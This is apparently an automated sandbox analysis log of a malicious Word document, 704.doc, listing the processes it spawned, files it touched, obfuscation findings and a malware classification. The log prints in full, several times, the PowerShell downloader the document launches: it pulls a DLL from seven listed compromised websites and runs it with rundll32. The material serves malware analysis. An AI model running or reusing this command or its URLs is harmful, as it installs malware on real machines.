Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.... .................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....h.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.... .................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............:T.k......T...............7.............}..v............0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............ZU.k....h.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....$......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....%................7.............}..v....0&......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....,......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....-................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(3................7.............}..v.....3......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....p:......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(;................7.............}..v.....;......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......?......0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....@................7.............}..v.....A......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....PF......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....G................7.............}..v.....G......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......T...............7.............}..v.....K......0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....K................7.............}..v....PL......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....H.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v....h.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k.... .................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.4.9.............}..v............0.b...............T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{.......t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .<.<.<.<. . .$.d.f.k.j.....0.b...............T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{................m.k......................7.............}..v....`.......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v....(%......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k.....%................7.............}..v....`&......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .t.e.r.B.i.n.d.i.n.g.E.x.c.e.p.t.i.o.n.....}..v.....*......0.b...............T.....,.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....8+................7.............}..v.....+......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v.....2......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....83................7.............}..v.....3......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .n.d.s...I.n.v.o.k.e.E.x.p.r.e.s.s.i.o.n.C.o.m.m.a.n.d.....0.b...............T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k.....8................7.............}..v....09......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ........l.k......T...............7.............}..v.....<......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....x=................7.............}..v.....=......0.b.............h.T.............(...............	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$704.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.expl.evad.winDOC@5/13@0/0

Source: 704.doc	OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp

Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: ~DF59F33552EDE7EF7C.TMP.0.dr

Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations

Obfuscated command line found

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
